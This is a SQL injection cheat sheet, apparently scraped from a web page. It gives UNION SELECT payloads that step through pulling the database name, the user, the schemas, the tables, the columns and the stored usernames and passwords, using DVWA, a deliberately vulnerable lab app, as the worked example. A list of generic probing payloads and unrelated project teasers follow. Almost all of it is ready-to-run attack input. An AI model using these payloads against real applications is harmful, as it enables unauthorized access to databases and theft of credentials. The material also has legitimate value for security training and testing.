Get Database Name
' union select database(),2 --
Get Username
' union select user(),null --
Get Databases
' union select distinct table_schema, null from information_schema.tables--
Get Tables
' union select null, TABLE_NAME from information_schema.tables where table_schema='DATABASE_NAME'--
Example
' union select null, TABLE_NAME from information_schema.tables where table_schema='dvwa'--
Get COLUMNS
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='DATABASE_NAME' AND TABLE_NAME='TABLE_NAME'--
Example
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='dvwa' AND TABLE_NAME='users'--
Get Data from Table
' union select username, password from DATABASE_NAME.TABLE_NAME --
Example
' union select username, password from dvwa.users --
Generic Payloads:
'
"
''
`
``
,
""
/
//
\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
Our project is to find the fault in the underground transmission line our main focus to re...
The main focus of this project is our blind community who our unable to feel the pleasure...
An Autonomous UGV (Unmanned Ground Vehicle) is essentially a Robot that operates without t...
The Ghazi Transport Management System is the application developed to manage the transport...
Global Navigation Satellite Systems (GNSS) are used by the autopilot of an aircraft during...